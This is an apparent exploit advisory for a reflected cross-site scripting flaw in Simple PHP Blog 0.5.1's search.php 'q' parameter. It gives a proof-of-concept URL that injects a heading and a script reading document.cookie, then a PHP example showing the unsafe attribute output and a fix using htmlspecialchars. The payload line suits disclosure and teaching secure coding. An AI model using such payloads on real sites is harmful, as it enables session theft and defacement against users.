Simple PHP Blog Cross Site Scripting Exploit

# Exploit Title: Simple PHP Blog Cross Site Scripting Exploit
# Date: January 12th, 2010
# Author: Sora
# Software Link: http://www.sourceforge.net/projects/sphpblog/files/SimplePHPBlog%20%28Beta%29/0.5.1/sphpblog_0511.zip/download
# Version: v5.11
# Tested on: Windows Vista

————————————
> Simple PHP Blog Cross Site Scripting Exploit
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: https://greyhathackers.wordpress.com/

# Vulnerability Description:
Simple PHP Blog is vulnerable to remote cross-site scripting via the ‘q’ parameter of search.php.

# Proof of Concept: http://127.0.0.1/blog/search.php?q="><H2>Hacked by Sora</H2><script>alert(document.cookie)</script>
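
The proof of concept starts with `">`, which suggests that q is echoed inside a double-quoted HTML attribute. The following is an added example, not Simple PHP Blog's own code: the function names, the `<input>` sink and the sample value are assumptions, used to show that pattern beside its output-encoded form.

```php
<?php
// Added example; hypothetical helpers, not taken from Simple PHP Blog.

// Unsafe pattern (assumed sink): the raw value is concatenated into a
// double-quoted attribute, so a '"' in q closes the attribute and any
// markup that follows is parsed by the browser as HTML.
function render_search_box_unsafe(string $q): string
{
    return '<input type="text" name="q" value="' . $q . '">';
}

// Hardened: encode at the point of output for the HTML context.
// ENT_QUOTES encodes both " and ', so the value cannot leave the attribute;
// ENT_SUBSTITUTE replaces invalid UTF-8 rather than returning ''.
function render_search_box_safe(string $q): string
{
    $encoded = htmlspecialchars($q, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="q" value="' . $encoded . '">';
}

// Fetch q as a string; array input such as q[]=x is treated as empty
// so it never reaches string functions.
function read_query(array $get): string
{
    $q = $get['q'] ?? '';
    return is_string($q) ? $q : '';
}

// Constructed sample input with the same shape as the value in the advisory.
$sample = ['q' => '"><h2>test</h2>'];
$q = read_query($sample);

echo "unsafe: ", render_search_box_unsafe($q), PHP_EOL;
echo "safe:   ", render_search_box_safe($q), PHP_EOL;

// Regression check: after encoding, no raw quote or angle bracket from the
// input may survive inside the attribute value.
$safe = render_search_box_safe($q);
$inner = substr($safe, strlen('<input type="text" name="q" value="'), -2);
if (preg_match('/["<>]/', $inner)) {
    fwrite(STDERR, "encoding check failed\n");
    exit(1);
}
```

Encoding belongs at output time and must match the context: `htmlspecialchars` covers HTML text and quoted attributes, but not values written into inline JavaScript or URLs.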
